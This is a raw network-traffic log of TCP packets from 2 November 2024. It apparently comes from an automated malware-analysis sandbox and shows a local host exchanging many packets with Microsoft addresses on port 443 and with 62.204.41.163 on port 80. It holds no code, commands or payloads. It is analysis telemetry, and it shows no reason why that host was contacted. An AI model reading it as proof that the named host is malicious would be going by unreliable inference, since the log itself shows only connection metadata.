Nov 2, 2024 17:57:01.242319107 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.242655993 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.242669106 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:01.242677927 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.242791891 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:01.242831945 CET	443	50011	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:01.243202925 CET	50011	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.245055914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.245069981 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.245080948 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.245119095 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.245150089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.256201029 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.256638050 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.256654024 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.257352114 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.257358074 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.276993036 CET	443	50019	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.277060032 CET	443	50019	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.277118921 CET	50019	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.277276039 CET	50019	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.277292013 CET	443	50019	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.277302027 CET	50019	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.277307987 CET	443	50019	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.279723883 CET	50025	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.279753923 CET	443	50025	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.279825926 CET	50025	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.280062914 CET	50025	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.280073881 CET	443	50025	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.294534922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.294589996 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.294595957 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.294601917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.294635057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.294720888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.294733047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.295005083 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.304691076 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.305469036 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.305516958 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.305913925 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.305922031 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.315474033 CET	50026	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.315525055 CET	443	50026	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:01.315603971 CET	50026	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.315776110 CET	50026	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:57:01.315793037 CET	443	50026	20.190.159.4	192.168.2.7
Nov 2, 2024 17:57:01.317879915 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.317924976 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.317939043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.317954063 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.317966938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.317979097 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318016052 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318094969 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318105936 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318118095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318145990 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318156958 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318232059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318289042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318300962 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318310022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318334103 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318362951 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318430901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318490982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318504095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318516970 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318547964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318574905 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318710089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318721056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318731070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318742990 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318752050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318756104 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318763018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.318804026 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318816900 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.318878889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.319055080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.322984934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323024988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323036909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323085070 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323098898 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323158026 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323169947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323182106 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323215961 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323242903 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323311090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323332071 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323344946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323358059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323370934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323389053 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323415995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323549986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323754072 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323772907 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323785067 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323796988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323810101 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323820114 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323822975 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323834896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323847055 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323848009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323859930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323863983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323873043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323884010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323896885 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323903084 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.323920965 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.323940039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324256897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324270010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324280977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324292898 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324306011 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324311018 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324317932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324330091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324342012 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324371099 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324548006 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324558973 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324569941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324606895 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324619055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324706078 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324718952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324732065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324743986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324758053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324765921 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324771881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324784040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324790001 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324795961 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324810982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324817896 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324822903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324834108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324847937 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.324856997 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324872017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.324892044 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325500011 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325525045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325536013 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325547934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325560093 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325570107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325573921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325587988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325599909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325601101 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325612068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325619936 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325623035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325634956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325647116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325649023 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325660944 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325670958 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325674057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325683117 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325685978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325700045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.325716019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.325741053 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.343621016 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.343657017 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.343708992 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.343765020 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.343811989 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.344295979 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.344319105 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.344346046 CET	50020	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.344355106 CET	443	50020	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.347143888 CET	50027	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.347158909 CET	443	50027	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.347865105 CET	50027	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.347999096 CET	50027	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.348016977 CET	443	50027	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.362739086 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.362778902 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.362824917 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.362854004 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.364526987 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.364573956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.364586115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.364588976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.364630938 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.391015053 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.391100883 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.391211987 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.392112017 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.392124891 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.392136097 CET	50021	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.392143011 CET	443	50021	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.395632029 CET	50028	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.395684958 CET	443	50028	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.395745039 CET	50028	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.396158934 CET	50028	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.396176100 CET	443	50028	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.413722038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.413768053 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.413779020 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.413856983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.413880110 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.413883924 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.413892984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.413955927 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.413979053 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.414000034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.436027050 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.436063051 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.436109066 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.436121941 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.436155081 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.436326027 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.436346054 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.436364889 CET	50022	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.436369896 CET	443	50022	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.437175989 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437227964 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437232971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437313080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437346935 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437357903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437369108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437381029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437398911 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437421083 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437561035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437572956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437583923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437597036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437624931 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437648058 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437807083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437818050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437830925 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437848091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.437865019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437895060 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.437910080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.438035965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.438046932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.438054085 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.438060045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.438080072 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.438112020 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.438175917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.438218117 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.440807104 CET	50029	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.440851927 CET	443	50029	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.440936089 CET	50029	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.441073895 CET	50029	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:57:01.441088915 CET	443	50029	13.107.246.45	192.168.2.7
Nov 2, 2024 17:57:01.442065954 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442121983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442168951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442181110 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442234993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442267895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442301989 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442308903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442363977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442379951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442418098 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442440987 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442480087 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442487955 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442511082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442557096 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442615986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442627907 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442640066 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442656040 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442677021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442692995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442730904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442785025 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442802906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442815065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442857981 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442938089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442949057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442959070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442972898 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442984104 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.442989111 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.442997932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443007946 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443049908 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443114042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443181038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443192959 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443219900 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443247080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443304062 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443321943 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443331957 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443344116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443346977 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443356991 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443366051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443383932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443408012 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443567038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443584919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443595886 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443607092 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443619967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443627119 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443631887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443644047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443654060 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443655968 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443667889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443667889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443681002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.443703890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443728924 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.443990946 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444003105 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444046974 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.444102049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444111109 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444123030 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444133997 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444143057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:57:01.444145918 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:57:01.444159031 CET	49933	80	192.168.2.7	62.204.41.163
